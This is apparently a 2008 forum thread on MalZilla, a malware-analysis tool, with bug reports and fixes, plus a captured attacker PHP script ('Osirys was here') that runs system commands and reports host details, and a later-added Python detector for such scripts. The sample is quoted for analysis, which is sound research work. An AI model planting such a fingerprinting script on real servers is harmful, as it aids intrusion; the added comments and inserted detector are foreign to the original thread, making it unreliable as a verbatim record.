Author Topic: MalZilla  (Read 257381 times)


September 03, 2008, 05:29:35 am
Reply #195

tjs

Another odd bug with v1.0. Right-click exit from the system tray causes Malzilla to return an empty dialog box and fail to exit.

Malzilla
-------
(X)
[ok]

TJS

September 03, 2008, 05:30:32 am
Reply #196

tjs

Actually, I don't know what I did-- but malzilla refuses to exit altogether! :P Anywhere I go to try to exit causes this dialog box. Going to have to terminate it the 'fun' way (process explorer) :)

September 03, 2008, 03:52:24 pm
Reply #197

bobby

I have reproduced the AccessViolation that JohnC and MysteryFCM got. I'm working on it.
If it is a kind of excuse, it is not my fault. It is a fault of the code behind the SynMemo component that I use in Malzilla.

September 03, 2008, 04:00:32 pm
Reply #198

JohnC

On some sites when you click send script to decoder, it might not highlight and send the script, or it might only send one. As an example, this will send the top script but if you click it again it doesn't send the second script and if you click it again it doesn't send the third. But if you click it again (there are only 3 scripts) it will go back to the beginning and highlight/send the first script like it should.

http://www.google.co.uk/

Also, if you click Run Script on the Decoders tab when there is no script, it will say script compiled, but the Run Script and Debug buttons will turn grey like it is busy. So you cannot use it until you close Malzilla and re-open it.

September 03, 2008, 05:05:30 pm
Reply #199

bobby

I've just fixed the problem with finding scripts and with disabled buttons.
I've also fixed AccessViolations.
The only remaining problem is that if the decoding gets stuck, I can't do anything like a Cancel button.

September 03, 2008, 05:21:50 pm
Reply #200

bobby

Please download this build from here:
http://malzilla.sourceforge.net/builds/

September 03, 2008, 06:24:45 pm
Reply #201

Orac

Just downloaded the latest one, which appears to have an FTP problem. I was unable to retrieve the script from this link, ftp://216.12.192.109/ids.txt

The script at the link was then retrieved using the first Malzilla version incorporating FTP.
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

September 03, 2008, 06:28:43 pm
Reply #202

bobby

Works fine here. Can you test with WGET or with an older version of Malzilla again?
Maybe it is a temporary server glitch or something like that.

September 03, 2008, 06:34:31 pm
Reply #203

MysteryFCM

Prolly just a server glitch ..... script was snagged without issue here :)

Code:
<?php
// Captured server-fingerprinting script (ids.txt). It reports host details
// back in the HTTP response; nothing here changes the server state.
function ConvertBytes($number)
{
        // Formats a byte count by the number of digits it has
        // (the comparison bounds 4 and 7 were lost in the paste and are
        // reconstructed from the neighbouring ranges).
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <= 6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <= 9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }
        return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "Osirys<br>";
// Host and PHP environment details; system() runs shell commands on the host
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
// Disk usage of the current directory
$free1 = diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1 = disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "Osirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
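A small triage helper for scripts fetched the way the one above was, added here as an example and not part of the thread or of Malzilla: it scores a PHP text for the fingerprinting calls the captured script uses (the call list, weights, threshold and the embedded sample excerpt are my own constructions).

```python
import re

# Constructed excerpt of the captured fingerprinting script; only the calls
# and strings visible in the posted code are used here.
SAMPLE_PHP = """<?php
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
echo "Osirys was here ..<br>";
echo "uname -a: $un<br>";
"""

# Constructed benign text for contrast: one environment lookup, no commands.
BENIGN_PHP = '<?php\n$path = getenv("PATH");\necho "hello";\n'

# Calls that, in combination, characterise an environment-fingerprinting
# script. Weights are assumptions; command-executing calls weigh most.
RECON_CALLS = {
    "php_uname": 2, "getcwd": 1, "phpversion": 1, "getenv": 1,
    "gethostbyname": 1, "diskfreespace": 1, "disk_free_space": 1,
    "disk_total_space": 1, "system": 3, "shell_exec": 3, "passthru": 3,
}

def scan_php_recon(source):
    """Return (score, hits) for a PHP text; hits maps indicator -> count."""
    hits = {}
    for name in RECON_CALLS:
        # match bare or @-suppressed calls, not substrings of other names
        n = len(re.findall(r"(?<![\w$])@?" + name + r"\s*\(", source))
        if n:
            hits[name] = n
    # Shell commands typically run through system() to fingerprint a host
    cmds = re.findall(
        r"system\s*\(\s*['\"]?(uptime|id|uname[^'\")]*)['\"]?\s*\)", source)
    hits.update({"cmd:" + c.split()[0]: 1 for c in cmds})
    score = sum(RECON_CALLS.get(k, 2) * v for k, v in hits.items())
    return score, hits

def is_recon_script(source, threshold=5):
    """True when the combined indicator score reaches the (assumed) threshold."""
    return scan_php_recon(source)[0] >= threshold
```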

September 03, 2008, 06:44:01 pm
Reply #204

Orac

Just tried grabbing it with the new version, this time it worked fine.

Must have been a server burp.


October 08, 2008, 08:15:40 pm
Reply #205

JohnC

Please can HTTP headers that are returned also be stored in the cache, so if we need to open a cached page, we see what headers were returned.

October 12, 2008, 07:31:09 am
Reply #206

bobby

> Please can HTTP headers that are returned also be stored in the cache, so if we need to open a cached page, we see what headers were returned.
I'm giving my best to do something about that script that uses HTML elements (where you also need these cookies).
I got one week free from the job (there is no job for me next week in the company), so I hope I'll get these new issues with obfuscation solved (incl. caching the cookies).

October 12, 2008, 03:49:44 pm
Reply #207

bobby

Implemented extended cache (cookies inclusive).
Partial working solution for the LuckySploit (the one with HTML elements and cookie).
Shellcode analyzer based on libemu is already implemented (you can analyze these WMF, ANI, PDF etc. exploits now).
As soon as I get some more free time, I'll finish LuckySploit deobfuscation and I'll push a release.
Malzilla's site would also need some updating :(

October 12, 2008, 03:54:09 pm
Reply #208

MysteryFCM

Looking forward to it dude :)

October 12, 2008, 06:38:16 pm
Reply #209

JohnC

Keep up the good work :)